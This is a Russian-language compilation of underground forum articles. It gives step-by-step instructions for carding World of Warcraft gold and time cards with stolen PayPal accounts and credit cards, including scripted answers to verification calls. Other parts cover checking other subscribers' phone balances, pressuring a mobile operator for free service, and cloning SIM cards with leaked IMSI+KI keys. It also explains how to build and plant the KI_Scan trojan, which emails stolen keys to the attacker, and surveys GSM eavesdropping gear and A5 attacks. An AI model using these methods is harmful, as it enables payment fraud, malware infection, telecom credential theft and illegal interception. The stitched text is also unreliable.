За что блочат аккаунты?

Для начала пару слов , что же такое World of Warcraft ?
WOW (World of Warcraft) или подругому как ее называют дрочеры геймеры – вовка , вов .
WOW Относиться к жанру MMORPG ( Multy Player Online Real Personal Game ) . Мультиплеерная онлайн ролевая игра. Сайт иры http://######.wow-europe.com .
В игре есть 2 стороны Alliance и Horde ( Алики и Орда)
Алики – это светлые Орда – это темные . Каждый реалм(сервер) в игре делиться на Альянс и орду.
Что же мы будем кардить ?
Wow Gold(Золото) – это игровая валюта игры которой производиться оплата в нутрии игры . Средняя стоимость продажи 1000 голдов сейчас составляет от 12$ до 20$ на евро серверах . Для сравнения 2 года назад я ее сливал по 50-60$ за 1000 золотых .
Сейчас вышла и Русская версия для русских игроков , но мы будем говорить про Европейские реалмы . Реалмы ( Сервера ) в игре . Их больше 200+ .
Burning Crusade – это аддон который вышел год назад
Если вы новичек и не шарите в игре World of Warcraft – ознакомитесь в это игрой и основные игровыми функциями на сайте wow.ru и на сайте wow-europe.com.
Что бы начать вам работать по теме World of Warcraft в кардинге , вам понадобиться :
1) Клиент World of Warcraft Burning Crusade
http://######.wow-europe.com/en/burningcru…load/index.html
1а. Аккаунт в игре (кардить не рекомендую , лучше купить на plati.ru (CD-Key World Of Warcraft Европейская версия).
2) Windows ( Любой подойдет и Русский и English версия )
3) Браузер Firefox
4) Соксы
5) Paypal – вериф акки с мылом.
6) Google
7) Skype + Пару CC ( желательно France ) + микрофон + Знание Англиского (необязательно знать его хорошо – корявый ломаный тоже подойдет )
ПОДГОТОВКА К РАБОТЕ
Устанавливаем игру . Покупаем CD-key World of Warcraft Burning Crusade Европейская версия на сайте Plati.ru и регаемся с помощью этого ключа тут https://signup.wow-europe.com/menu.html?locale=en_GB после рега акка вас попросят ввести либо данные кредитки либо гейм карты – для оплаты игрового времени . По моему опыту ничего страшного в этом нету – можно вбить любую даже невалид креду туда , что бы пройти этот шаг регистрации и завершить создания аккаунта .
Дальше запускаем клиент – и вводим данные логин и пасс которые регалии по cd-key . Убеждаемся , в том , что нас пускает в игру . После логина увидите несколько вариантов языковых реалмов English France German Spain – но нас интересует только English.
Для подготовки к работе , нам потребуется купить 5-10 верифицированных аккаунтов Paypal . Я вам советую покупать аккаунты англии UK . На форумах вы легко найдете продавцов которые вам продадут 10 вериф акков с вбитов кредой и банк акком . Я обычно покупаю за 100$ – 10 акков . Продавцы легко на такие условия соглашаются.
Когда вы купили наше главное оружие(палку) считайте пол дела уже сделано ) .
Берем сокс France(FR) Франции .
Далее покупаем пару кред Франции и регаем себе акк skype.com качаем софт с сайта – устанавливаем – дальше заходим через сайт на ваш акк и вбиваем себе немного кредитов 10евро на SKYPE OUT и покупаем себе несколько SKYPE IN номеров в Англии(UK). Я обычно покупал на каждый акк Paypal по 1 Skype-in . ( Если вам влом делать этот пунк , вы можете купить уже готовые вбитый акк скайпа уже с вбитым skype out и skype-in ). Но я обычно всю процедуру делал сам , т к это намного легче и удобнее . Для вбива в скайп используйте карты Франции Голд или Платинум – Это гарантирует большой срок жизни акков . Номера англии берем любые(по моему опыту).
Теперь у нас в наличии есть такое материал для работы :
1) Акк скайпа с номерами англии + кредиты skype out.
2) Вериф Палка Англии
3) Соксы Англии
4) Google
Далее идем в Google.com и вбиваем следующие “buy wow gold” и начинаем отбирать шопы.
Пару слов о том как лучше всего это делать .
Большие конторы вроде IGE.COM и Offgamers.com даже и не пытайтесь кардить . Очень сильный антифрод – прозвоны – проверка сканов – в общем посинеете там кардить . Лучше не заморачиваться. Но так же легко найти крупный хороший шоп – который делает прозвон сразу же после вбива и высылаем вам ваш ордер(GOLD) сразу же после прозвона.
Во первых это очень удобно , т к в некоторых свежих шопых не может оказаться данного кол-ва голда и вам придеться ждать по 12-24 часа пока его насобирают , для вас . За это время может залимититься палка и вам ордер не отдадут .
Для примера я возьму шоп Itemrate.com который я кардил в течении года – с которого ежедневно удодил по 10-50к голдов , при чем в очень хорошем темпе . Этот шоп делает прозвон , сразу же в течении 1-5 минут после оплаты ордера . В этом его большо плюс , так же в этом шопе постоянно большие запасы голда и вам его доставят сразу же после прозвона .
Заходим на itemrate.com под UK соксом переходим в раздел World of Warcraft – EU далее ждем World of Warcraft – EU – Gold – после чего выбераем интересующи нас реалм . Не спешите сразу же кардить там по 20 000 голда и быть счастливым , этого не получиться .
По моему опыту скажу , что там реално скардить до 5000 за ордер , т к эта сумма бывает частенько в наличии да и сумма ордера не слишком велика . Советую делать 2-3-4-5к за ордер . Вбиваем данные холдера вписываем Character Name( имя персонажа которого вы создали на интересующимся вас реалме ) . ввбодим телефон skype-in Который вы скардили и жмем Pay by Paypal и нажимаем Complete. Далее переходим на оплату через палку , логинемся в акк – делаем оплату .
В течении 1-5 минут иногда редко очень может затянуться до 30минут вам сделают прозвон на ваш указанный номер . в 90% случаем вы услышите женски китайский голос с ломаным англиским . Все , что вас спросят это на какой Realm вы заказывали голд , сколько заказывали , какой ваш paypal email , и имя героя в игре . Не бойтесь отвечайте как можете , я когда начинал работать по этой теме палился сам прозванивать но после 3-4 ордеров понял , что это проще простого разговаривать с китайцами которые языка тоже особо не знают )))) .
Примерные вопросы :
Вопрос : Hello . Are u “Name of Holder” .
Ответ : Yes . Hello
Вопрос : Did you buy 3000 gold from Itemrate.com ?
Ответ : Yes .
Вопрос : What is urs character Name :
Ответ : Ваше имя персонажа
Вопрос: How many did u pay for order ?
Ответ : Сумма которые платили через палку
Вопрос : What is urs character Level? (спрашивают уровень героя)
Ответ : Всегда пиздите что 60-70 уровень у васю
Могут так же спросить ваш Paypal Email.
Если вы ответили на все вопросы правильно и если у конторы где вы кардите голд если в наличии вас попросят пробежать до почты в игре в ближайший пригород , от того места где вы начали игру с создания персонажа . Для Alliance это Goldshire для Horde это Ratchet (ближайшие пригороды с почтой) . в 99% шопах служба доставки(ихний герой в игре) будет вас встречать , там для передачи вашего ордера на вашего персонажа . Раньше конторы слали весь голд по почте и это было намного удобнее но после того как админы игры начали массовый бан аккаунтов за такие пересылки , шопы перешли на такой метод доставки (называется Face-to-Face) .
И так мы сделали ордер , приняли звонок , получили голд .
Что же теперь с этим голдом нам делать ?
Ессесно продавать )))
Кому ?
Тем же конторам )))
Например Offgamers.com скупает интересующий им голд в онлайне 24 часа в сутки. Просто регаетесь на сайте , переходите меня World of Warcraft EU и выбераете Sell . Дальше вы увидите список реалом и кол-во голда которое данная контора готова купить у вас , кардите голд – сливаете этой конторе , там все упрощено делаете сразу через сайт продажу – как продавать разберетесь . После продажи контора добавляет деньги на ваш акк . Выводят деньги с акков они почти по всем системам в том числе и Webmoney .
Так же можно работать на заказ .
Идете в Google.ru ищите русские конторы которые продают золото на Европейски серваках . Google.ru запрос Продажа WOW . Стучите суппортам в аськи и спрашиваете не нужны ли им поставщики . Обычно они сразу говорят скока и куда им нужно и готовы подождать до 24 часов пока вы не соберете голд .
Еще один вариант это спам в игре . Я обычно покупал краденые акки с логов за 1$ за валидный акк . Заходил в игру на реалм где есть голд у меня – бежал столицу(Главный город) у Alliance(Stormwind или Ironforge) у Horde(Under City или Orgimarre) . Писал макрос которые встроены в игре виде /1 Продам 1к голда 15$ Дешево Быстро со скидкой и тд И встравал в игре на афк с этим макросом , так и слива . Еще можно на plati.ru зарегаться и продавать там , что бы быстрее шли продажи оплачивате рекомендуемые товары каждый день рекламу – обычно от 0.1$ до 20$(сразу на главную) за 1 лот.
Вот еще пару контор которые я кардит по Wow Gold .
Gamesavor.com ( шлет сейчас 1-2к не больше а то гемор )
Itemgarden.com ( и по 5-7к кардиться но когда много чарджей ебет мозги и переходит на MB )
Меры предосторожности , что бы холдер меньше палил свой акк Paypal.
Лично я делал так .
Покупал палку по таких параметрам
###### Paypal + Email(Hotmail.com или MSN.Com) + CC+BankAccount+Noactive(неактив хотя бы от 5-7 дней) .
Дальше заходил на мыло на hotmail.com ->Options->More Options>Filters
Выставлял
Exclusive ( что бы ничего не призодило на мыло вообще – не конфирмы с палок и прочие палево)
И выставлял Deleted Junk Email .
Что бы все что приходило удалялось сразу же .
Как кардить Cd-key/Time-Cards ?
Все в том же itemrate )))) только по адресу http://gocdk.com/
За ордер не более 2х Карт а то попросят платить через moneybookers.
Вбиваете 2 карты – так же получаете сразу же прозвон – отвечаете на легкие вопросы – и сразу же после прозвона получаете на мыло холдера 2 скана тайм карт ))) .
Обычно я делал 1 ордер на 2-5к голда + ордер на 2 тайм карты ( если начинали залупаться по телефону , что мол я 1й раз покупаю я им отвечал , что я делал еще заказ на тайм карты или голду и сразу же отъебывались ).
Советы:
1) Не держите слишком много золота на 1м аккаунте . Около 20-30к не больше . Если есть возможность купить аккаунты с высоким уровнем мылом и прочими данными сделайте это. ( Но знайте , что настоящий владелец аккаунта все равно сможет его себе вернуть , даже если вы все смените , заявив о краже акка админам ).
2) Не делайте с 1 Paypal аккаунта больше 1-2оплат в сутки на общую сумму 200-300$ а не то поймаете лимит )
3) Используйте 1 Skype-in Номер для каждого аккаунта. Всеравно иногда можно 1 и тот же номер юзать и оплачивать с разных акков в некоторых шопах не палят это в том числе и в itemrate )))
4) Если при получении Голда в игре вы будите 1 уровень и вам будут задаваться вопросы мол типа почему у вас 1 уровень , отвечайте смело – “Покупка голда является нелегальной в игре и я не хочу , что бы моего основного Персонажа заблокировали” .
5) Юзайте Firefox Браузер – Если у вас русская версия в настройкая выберете Настройки языка – Удалите если есть Русский и другие и добавьте English/Gb

Народ, заранее извиняюсь за ошибки в статье, если они присутствуют… Я не совсем в трезвом состоянии пишу её… Статья может и для многих не новость и я понятия не имею, как работает этот севрис, но там автоответчик кричит, что пополнение счётак принято, хотя мы ничего не будим пополнять, но всё-же… Хочу рассказать, как проверить баланс другого человека, который подключён к BeeLine…
Набираем номер +79033888696 и ждём твета автоответчика…
Далее набираем номер ввиде 79033403225 (если номер 89033403225) и жмём решётку (#)
Далее нам говорят (автоответчик), что сумма на вашем счёте такая-то такая-то (это и есть баланс чела, счёт которого мы хотим узнасть… Всё очень просто… С биллайна звонок бесплатный, а с других ОпСоСвов вроде платный..

ОбычныйТерминСписокопределенийАдресЦитатыФорматированныйконецформыначалоформыМетодика получения бесплатной сотовой связи основана на информационной технологии, поэтому Вам следует быть готовым к тому, что придется собирать и обрабатывать большое количество информации.
Методика описывает два противоположных по применению метода, но оба они одинаково эффективны. Ваша цель -при применении как первого, так и второго метода -получить бесплатную сотовую связь “из рук” самого сотового оператора. Лишь такой подход гарантирует Вам законное пользование сотовой связью. Путей к достижению данной цели известно множество, но я расскажу Вам о двух самых простых из них и доступных каждому.
Зададимся вопросом: “Что можно предложить сотовому оператору в обмен на получение права пользования бесплатной сотовой связью?” и попробуем ответить на него.
Перед тем уделим немного внимания тому, что именно мы хотим получить и сколько это будет стоить самой сотовой компании. Забудьте о цене, которая предлагается дилерами операторов. На самом деле пакет безлимитной сотовой связи для клиента обходится сотовой компании всего в несколько долларов в месяц, чаще не больше 5$. Это настоящие расходы самой сотовой компании. Все остальное -плата за маркетинговую политику. Учитывая эти факты, не стоит забывать, что вы просите у компании не так и много.
Но перейдем к практике. Речь пойдет о PR (Public Relations -связи с общественностью). Любой компании важна собственная репутация в глазах ее клиентов и общественности. Вероятно, Вы часто обсуждали с Вашими знакомыми качество услуг того или иного оператора связи. Всего лишь разговоры, мнения, слухи… Но знаете ли вы, какой непоправимый финансовый ущерб может принести компании негативный отзыв, который уже успел перейти в категорию “слуха”?
В середине девяностых годов в США существовала компания, выпускавшая питьевую воду. Она успешно работала, и качество продукции было на высоте. Оборот компании и ее прибыль были сверхмаксимальными. Однако всю компанию погубил всего лишь один отзыв, ставший популярным слухом. Отзыв этот был написан одним из клиентов компании и размещен на одном публичном сайте в сети интернет. Отзыв не отражал правдивого положения вещей. Клиентом, поместившим отзыв, был куплен всего один пятилитровый баллон воды, произведенной данной компанией. На упаковке имелись следы повреждения, и клиент решил благоразумно поступить -обменять товар на кондиционный без признаков нарушения товарного вида. Казалось бы, пустяк. Всего-навсего бутыль с водой, но в магазине наотрез отказались обменять товар, ссылаясь на отсутствие чека платежного документа у клиента (чек не был сохранен). Этот отказ принес компании-производителю убыток в размере пятисот миллионов долларов, а впоследствии полностью разорил компанию. Обиженный покупатель оказался преподавателем химии в одном из колледжей в США. И чтобы как-то себя утешить разместил на своем личном сайте в интернете фальсифицированный результат анализа воды из купленной бутылки. В его отчете упоминалось о содержании в составе воды нескольких химических соединений, которые вредят здоровью потребителей и разрушающим образом воздействуют на организм человека. Не прошло и месяца, как отчет распространился еще на ряде сайтов. А еще через четыре месяца менеджеры компании, производившей упоминаемую воду, заподозрили неладное -в магазинах стали все меньше и меньше покупать продукцию их компании. Вскоре о материале стало известно “желтой прессе” и отчет был неоднократно опубликован со ссылкой на источник. Некая группа потребителей (вполне вероятно финансируемая конкурентной компанией) создала сайт, где с катастрофической скоростью собирались все новые и новые негативные отзывы клиенты и напуганных покупателей. Через 12 месяцев потребление воды, выпускаемой упомянутой компанией, снизилось на 90%. Отдел маркетинга компании пытался исправить ситуацию, запуская в прессу опровержения информации о содержании в воде вредных веществ. Был даже произведен массовый отзыв всей продукции компании из торговых сетей. Были проведены независимые экспертные исследования. Вода соответствовала всем стандартам качества, но ничто уж не могло спасти продукт и имидж компании. Покупатели, лишь раз усомнившись в качестве продукции, уже никогда не стали бы рисковать, проверяя опровержение информации на себе. Если бы отдел по связям с общественностью вовремя отреагировал на появление негативной информации, то ничего подобного не произошло.
Другой компанией, выпускавшей консервированные продукты питания, был вовремя обнаружен сайт, где собирались негативные отзывы о продукции компании. Руководство компании провело с владельцем сайта переговоры. Выяснилось, что это один из покупателей продукции компании, который в свое время имел претензии к купленному продукту. Владельцу сайта предложили продать права на домен и материал сайта за совершенно нескромную сумму. Сделка осуществилась и сегодня на этом сайте находится центр компании по приему отзывов о клиентов. Все отзывы рассматриваются и принимаются необходимые меры.
Как видите для каждой компании важно мнение общественности. Именно на общественном мнении построен наш метод. Задача – создать сайт, целью которого будет сбор отзывов клиентов о работе определенного сотового оператора.
Создавать можно сайт, который будет собирать положительные или отрицательные отзывы. В любом случае, деятельность такого сайта заинтересует отдел PR сотовой компании и ее конкурентов.
Как только сайт станет достаточно известным с Вами (автором и владельцем сайта) свяжутся менеджеры компании и пригласят подъехать в офис компании, чтобы кое-что обсудить.
Если Вы создали сайт с негативными отзывами, то не торопитесь на встречу -ведите переговоры через посредника.
Если сайт содержит лишь положительные отзывы, то соглашайтесь на встречу. Скорее всего, вас хотят отблагодарить, сделать предложение по внесению на сайт рекламных материалов и пресс-релизов, либо просто купить Ваш сайт, чтобы самостоятельно следить за его активной работоспособностью.
В любом случае помните – Ваша минимальная цена – бесплатная сотовая связь на неограниченный срок. Что, как Вы помните, обходится компании оператору всего в несколько долларов в месяц.
Не забудьте в разговоре оперировать тем фактом, что Ваше творение могут купить конкуренты.
Как по-вашему, важно для компании иметь под контролем источник, формирующий общественное мнение и мнение ее (компании) клиентов? Доступно ли компании потратить несколько долларов в месяц, чтобы этот источник контролировать?
Для сравнения приведем стоимость ежемесячной платы за размещение щита на улице со средней загруженностью транспортом. Сравнительно небольшой баннер-растяжка обходится рекламодателю в 2-3 тысячи долларов США в месяц.
А если говорить о рекламе по телевидению, то ее стоимость уже давно превышает 5 тысяч долларов за тридцатисекундный ролик.
Итак, мы рассказали о методе законного получения бесплатной сотовой связи. Надеюсь, что эта информация и методика будут успешно Вами применены, а также заслуживают той небольшой платы за наш труд, что Вы внесли.
Желаю Вам удачного применения методики.

конецформыначалоформыМногим известно про клонирование карточек и все те преимущества, которые появляются при этом. Чтобы создать клон SIM карты, понадобится обычная микросхема за 7$, желательно прошитая под специальную программу. Эта программа называется SIM-Emulator. Затем понадобятся ключи доступа в сеть, IMSI+KI. Дело в том, что при включении мобилки, иногда перед началом звонка, происходит аутентификация телефона в сети GSM. Сеть GSM должна опознать, что звонит именно её абонент, а не просто левая трубка. В процессе аутентификации участвуют как раз IMSI+KI (логин и пароль). Если авторизация успешна – сеть пропускает телефонный звонок. На каждой SIM карте есть свой один IMSI+KI. Чтобы извлечь эти ключи, SIM карту помещают в специальное устройство за 20$, называемое SIM-сканер. При успешном считывании, ключи можно прописывать в карту-эмулятор и пользоваться клоном.
На этом теории достаточно, кому интересно – все подробно описано на сайте http://www.kiscan.net/
Приобрести уже прошитую Silver-карту можно на любом нормальном радиорынке или через Internet. Не следует переплачивать и покупать ее дороже 7-10$. Выглядит она как стандартная банковская карта http://www.kiscan.net/silvercard.jpg http://www.kiscan.net/smallsim2.jpg но ее аккуратно вырезают ножницами или скальпелем, чтобы она влезла в телефон. Вот некоторые точки продаж:
http://www.kievsat.com/my/index.php?cPath=30_31
http://www.megasim.ru/
http://www.flycont.com
Радиорынок Митинский в Москве, Кардачи в Киеве (множество мест торговли товарами для спутникового TV).
Если требуется клонировать безлимитный телефон который завалялся на вашей фирме, тогда потребуется еще и SIM-сканер и возможность на 2 часа поиметь SIM карту в программаторе.
Если на обычной SIM карте хранится только 1 IMSI+KI, то на мульти SIM их можно записать от 10 до 16. Были бы только эти самые ключи доступа к сети GSM. После покупки карты, можно ввести в SIM-Emulator вот эти рабочие ключи:
Country Operator IMSI KI
Greece COSMOTE 082920101110833673 5F30D6FFDFDF3486CB16626650EE3217
Croatia HR – CRONET 082991100900212530 2275E723C2423B1636AB1FBDFD1E6ACB
Czech Republic CZ PAEGAS 082903100900400752 7A6409742771206963787535DDA70905
Czech Republic EUROTEL-CZ 082903209000405290 D6CF34B42ABED0618A8144010A9E97E9
Yugoslavia YU MOBTEL 082902100200136782 BF5038A2865A84EB0E850A886B6FEC03
Croatia HR – CRONET 082991107100615323 BEA33DDC99D33FDA0D4F67C3FC47153D
Рабочие они в том смысле, что они регистрируются в сети и принимают входящие звонки. Исходящие звонки в них запрещены (Outgoing calls barred).
Вот эта статья как раз и посвящена тому, где взять ключи IMSI+KI для доступа в сеть для ХАЛЯВНЫХ звонков.
Итак, «Если денежные знаки ходят по стране, значит есть люди, у которых их очень много» (с) О.Бендер. То же самое можно сказать про базы данных с ключами IMSI+KI. Есть компьютеры и целые сети, где таких ключей хранится действительно много. Это и внутренние сети мобильных операторов, компьютеры их дилеров, сервис-центров, технических специалистов и многих других категорий. И еще есть также специальная программа, называемая KI_Scan, которая служит для того, чтобы ее отправляли на все эти компьютеры. KI_Scan сканирует все жесткие диски, ресурсы локальной сети, включая вложенные архивы и двоичные файлы прошивок. Цель поиска — ключи IMSI+KI. После сканирования, найденные ключи отправляются на ваш E-Mail, который вы пропишете перед отправкой Трояна. Таким образом, вы получаете рабочие ключи, каждого ключа хватает для активных звонков от 2 дней до 2 месяцев. Лучше всего работают, конечно же европейские номера (и неудивительно, разве русское вообще что-либо может работать нормально?). Итак, вашей задачей является только грамотная отправка Трояна на те компьютеры, где лежат такие ключи. Очень хорошо работает такая схема, когда создается свой сайтик, а ссылки на него кидаются в тех.специалистов.
Примерная схема работы с KI_Scan такая:
— качаем дистрибутив, из которого собирается модуль KI_Scan : http://www.kiscaner.pop3.ru/build_dir.rar и http://www.gsm-best.com/se/se_woron_scan_1.09_eng.zip
Потом качаем сканер сим карточек от Дежана:
http://www.gsm-best.com/se/se_sim_scan.zip
— в файл build_all.bat прописываем ваш E-Mail на который будут приходить ключи от KI_Scan. Просто замените все youremail@yourdomain.com на ваш E-Mail
— Вы можете определить любую программу, в которую будет вставлен KI_Scan. По умолчанию, KI_Scan прикрепляется к известной программе “Woron_Scan” , качаем отсюда: http://www.gsm-best.com/se/se_woron_scan_1.09_eng.zip для сканирования IMSI+KI с SIM карт. Но достаточно положить свой ЕХЕ файл в каталог build_dir, а в файле build_all.bat просто указать вместо “-build woron_scan_1.09_eng.exe” ВАШ файл “yourfile.exe”. Если вместо “starter_woron.exe” указать “starter_typical_installer.exe” или “starter_sim.exe”, тогда просто заменится иконка результатного файла.
— Когда все готово, нажимаем build_all.bat . Готовый файл с Трояном будет запакован в архив и предназначен для отправки. Вот только просьба не запускать ki_scan.exe иначе ваш компьютер будет подвержен сканированию.
— готовый zip-файл следует отправить на место назначения (выложить на свой сайт или отправить оператору). Некоторые рекомендации по отправке описаны тут http://www.kiscaner.pop3.ru/
— приходящие E-Mail следует расшифровывать с помощью программы “Decoder”. Из них извлекать ключи и вводить их в свой телефон. Инструкции по вводу есть тут http://www.kiscan.net/8_ru_emu_phone.htm
— звонить всей компанией, в любые точки мира, сколько душе угодно.
— иногда ключей бывает так много, что пришлось написать специальную программу KeyChecker для их автоматической проверки и обработке. Вот может пригодится http://www.kiscan.net/11_ru_keychecker.htm, если вы проявите интерес и настойчивость, которая нужна в любом деле. Вот так и пользуемся бесплатной моб. связью с жопарезом.
ОБЯЗАТЕЛЬНЫЕ ПРОГРАММЫ ДЛЯ РАБОТЫ:
1. SIM-Emulator Configurator
http://www.gsm-best.com/se/se_SIM_EMU_6.01_Configurator_Lights.zip
2. Сканер SIM карточек от Дежана
http://www.gsm-best.com/se/se_sim_scan.zip
3. Сканер SIM карточек от Ворона
http://www.gsm-best.com/se/se_woron_scan_1.09_eng.zip -
4. Файл se_readme.html (не переименовывать его в архиве)
http://www.gsm-best.com/se/se_readme.zip
Всем удачи!

Число пользователей мобильных телефонов стандарта GSM в мире превысило один миллиард. Каждый день они говорят обо всем, что только можно представить себе. Передается информация, которая стоит миллионы. Как можно прослушать ее? Слушает ли кто-то твои разговоры по телефону?
А возможно ли вообще прослушать чужой разговор в сетях GSM или все это слухи, запущенные «желтой» прессой и провокаторами? Разберемся с этим вопросом подробнее. Вот мнение «отцов» в лице Джеймса Моpана – директора подразделения, отвечающего в консорциуме GSM за безопасность и защиту системы от мошенничества: «Никто в мире не пpодемонстpиpовал возможность перехвата звонков в сети GSM. Это факт… Насколько нам известно, не существует никакой аппаратуры, способной осуществлять такой перехват». Есть ли смысл сомневаться в этих словах?
У сотовой связи (как и у любой радиосвязи) есть один огромный минус: передача данных идет «по воздуху», поэтому она может быть перехвачена. Единственный способ предотвратить доступ к информации (в нашем случае прослушивание) – система безопасности на основе серьезного шифрования данных. Известно, что в создании системы безопасности протокола активное участие принимали спецслужбы стран НАТО. Основа системы безопасности GSM – три секретных алгоритма, которые сообщаются лишь поставщикам оборудования, операторам связи и т.д. A3 (http://www.pgpru.com/%C1%E8%E1%EB%E8%EE%F2%E5%EA%E0/%D1%EB%EE%E2%E0%F0%FC/A3) – алгоритм авторизации, защищающий телефон от клонирования, A8 (http://www.pgpru.com/%C1%E8%E1%EB%E8%EE%F2%E5%EA%E0/%D1%EB%EE%E2%E0%F0%FC/A8) – «сервисный» алгоритм, который генерирует криптоключ на основе выходных данных алгоритма A3, A5 (http://www.pgpru.com/%C1%E8%E1%EB%E8%EE%F2%E5%EA%E0/%D1%EB%EE%E2%E0%F0%FC/A5) – алгоритм шифрования оцифрованной речи для обеспечения конфиденциальности переговоров. Больше всего нас интересует последний.
Опять A5
В сетях GSM используется две версии алгоритма A5: A5/1 и A5/2. Такое разделение произошло «благодаря» экспортным ограничениям на технологии шифрования. В итоге страны Западной Европы и несколько других наиболее цивилизованных мест получили право использовать алгоритм A5/1, а остальным странам (в том числе России) разрешили использовать «слабый» A5/2. Алгоритмы семейства A5 были засекречены, однако их основные детали стали известны уже к 1994 году. Сейчас об алгоритмах защиты GSM общественность знает практически все.
В A5 реализован поточный шифр на основе трех линейных регистров сдвига с неравномерным движением. Такой шифр зарекомендовал себя как довольно стойкий при большой величине регистров и некоторое время использовался в военной связи. В A5 используют регистры в 19, 22 и 23 бита, в совокупности дающие 64-битный ключ. При том, что длина шифра небольшая, вскрыть его «на лету» (а этого требует сама задача прослушки) не под силу даже довольно мощным компьютерам, то есть при должной реализации GSM-протокол может иметь неплохую практическую защиту. Но кое-кто имеет свое мнение начет того, какая защита должна быть у сотовой связи. Например, свое мнение есть у спецслужб, которым фрикеры должны сказать «спасибо».
Вот выдержка из приказа Минсвязи «Об использовании средств связи для обеспечения оперативно-розыскных мероприятий Министерства безопасности Российской Федерации» (полный текст http://www.aboutphone.info/lib/sorm.html ):
В состав оборудования сетей электросвязи должны быть включены аппаратные и программные средства, позволяющие проводить оперативно-розыскные мероприятия из удаленного пункта управления путем взаимодействия этого пункта и оборудования электросвязи.
Должна быть предусмотрена возможность по команде из пункта управления конспиративного подключения выделенных служб безопасности каналов и линии к любым абонентским линиям (каналам), в том числе находящимся в состоянии установленного соединения.
[Должен осуществляться]… контроль исходящих и входящих вызовов (местных, внутризоновых, междугородных и международных) к/от определенных абонентов данной станции, а также контроль вызовов и заранее заданных номеров телефонной сети при исходящей связи абонентов этой станции.
Смысл документа таков: обеспечить полный контроль за абонентами любых средств связи (в том числе мобильной связи). Видимо, поэтому в 64-битном ключе 10 битов просто заменены нулями. Кроме того, из-за многочисленных конструктивных дефектов стойкость шифра находится на уровне 40-битного, который легко может быть вскрыт любым современным компьютером за пару секунд.
Итак, возможность прослушивания любого абонента в сетях GSM – это не только реальность, но и норма, закон (кроме прослушивания, выписана «индульгенция» на определение местоположения, фиксацию номера и многие другие «услуги»). Что ж, ответ на вопрос «Есть ли прослушка в сетях GSM?» ты получил. Теперь разберемся с другим вопросом.
Тварь ли я дрожащая или право имею…
Как бы маркетологи ни убеждали нас в том, что защита GSM безупречна, это далеко не так.
Даже «сильный» A5/1 был вскрыт с помощью довольно обычного оборудования (хотя при этом использовались нетривиальные методики). Что уж говорить об A5/2? Кроме того, есть повод поблагодарить наши спецслужбы еще за одну вещь: при некоторых обстоятельствах операторы полностью отключают шифрование разговоров (так было на праздновании 300-летия Питера, при захвате заложников на Дубровке в Москве). Поэтому, используя средней мощности компьютер и «правильное» программное обеспечение, ты можешь расшифровывать сигнал с «вражеской» GSM-трубки за приемлемое время. В Сети выложено множество программ для взлома GSM-защиты, использующих разные методы.
Однако для расшифровки нужно сначала получить материал. Так ли это просто?
Аппаратура для перехвата и расшифровки GSM-сигнала появилась одновременно с принятием стандарта GSM. Сейчас в мире существует около 20-ти эффективных (и, если можно так сказать, популярных) видов оборудования по прослушке GSM-связи, стоимостью от $12 000 до $2. Более того, есть подобная аппаратура отечественного производства (разработка Военной академии связи имени С. М. Буденного), которая некоторое время назад использовались во многих отделах управления «Р» МВД РФ.
Изделия для перехвата GSM-сигнала, независимо от их типа, быстродействия и цены, должны иметь следующие возможности:
Контроль управляющего и/или голосового канала базовой станции;
Контроль управляющего и/или голосового канала мобильного телефона;
Сканирование всех каналов и поиск активных (в данной точке);
Запись сигнала (или разговора) на жесткий диск (или другой носитель);
Фиксация номеров вызывающего и вызываемого абонента.
Это основные требования к аппарату, способному перехватить GSM-сигнал для последующей расшифровки. В подобных «средствах связи» среднего и верхнего ценового диапазона предусмотрена мгновенная расшифровка и возможность прослушивания сразу нескольких абонентов.
Снифер для GSM
Использование разнообразных средств слежения за мирными гражданами всегда было прерогативой органов госбезопасности, поэтому в идеале наблюдаемые не должны даже догадываться о том, что за ними следят. Но «утечки» информации происходят даже из спецслужб, поэтому на рынке представлена разного рода спецтехника. Применение таких устройств – незаконное дело, поэтому они не продаются «в открытую». Как следствие, этот рынок оброс толпой «кидал» – если вдруг соберешься купить что-нибудь из спецтехники, не соглашайся на полную или даже частичную предоплату.
Вот несколько образцов изделий для мониторинга систем GSM-связи.
PostWin
PostWin – программно-аппаратный комплекс, имеющий в своем составе блок приема и обработки сигналов, две ПЭВМ класса P-III и комплект программ. Может использоваться для перехвата сигналов AMPS/DAMPS, NMT-450, GSM-900. Есть возможность вести запись на жесткий диск со сжатием (13 Кбит/с) и без сжатия (64 Кбит/с).
GSM Interceptor Pro
Более продвинутая система мониторинга GSM-связи. Из особенностей стоит отметить зону охвата станции: перехват прямого канала (от базовой станции) до 25-ти километров и до 800 метров – обратного канала (от трубки). Комплекс работает с алгоритмами A5/1 и A5/2.
SCL-5020
Данный аппарат разработали инженеры Индии. Кроме «джентльменского набора» опций, предлагается прослушивать до 16-ти GSM-каналов, определять расстояние до базовой станции, записывать речи на жесткий диск. Более подробную информацию по готовым решениям в области GSM-прослушки ты всегда можешь найти в Сети, однако, если будешь использовать простой сканер и заниматься расшифровкой на домашнем компьютере, сэкономишь свои кровные.
Интересное решение предлагает некая компания «Мелафон» – сканер для прослушивания сотовых телефонов «Мелафон-Аудиовокс».
Как утверждают (http://www.melafon-bugs.ru/super_equipment.htm) производители, сканер позволяет вести мониторинг, если известен только номер телефона абонента (сомнительно, но имеет право на жизнь). Цена аппарата – 12700 рублей.
Мы пришли к тому, что комплекс для прослушивания чужих разговоров можно либо купить (цена ~15k – довольно дорого, но очень эффективно), либо собрать самому (~5–6k), но при этом надежность и качество работы такой системы – только твоя головная боль. В любом случае, если есть задача получить как можно больше информации о человеке, GSM-прослушка – лишь один из множества инструментов, которые необходимо применять в комплексе. Если же ты просто хочешь узнать, о чем говорят люди по мобильнику, необходимый комплект оборудования можно при желании приобрести и на Митинском радиорынке.
Криптоанализ и взлом A5
Алгоритм основан на регистрах сдвига с линейной обратной связью определенной длины (19, 22, 23 бита). Начальные заполнения регистров определяются секретным и открытым ключами. Открытый ключ известен и отличается для каждого нового сеанса. При связи двух абонентов шифрование осуществляется дважды, так как A5 используется для безопасной связи между абонентом и базовой станцией. Вот основные методы атаки:
Лобовая атака
Самый простой тип атаки, однако достаточно эффективен при коротких регистрах. В случае с A5 (особенно A5/2) позволяет организовать вскрытие ключа с перебором максимум 240 вариантов. Делается предположение о содержимом первых двух регистров, а содержимое третьего регистра восстанавливается по шифрующей гамме.
Корреляционный анализ
Ходят слухи, что с помощью этого метода алгоритм A5/1 был вскрыт еще в 1994 году. О методе известно немного: «Для восстановления начальных заполнений используется техника разреженной матрицы (была опубликована в апреле 1993г. в издании Mobile Europe); для вскрытия используются приемы из криптоаналитических работ Андерсона, Доусона, Кларка».
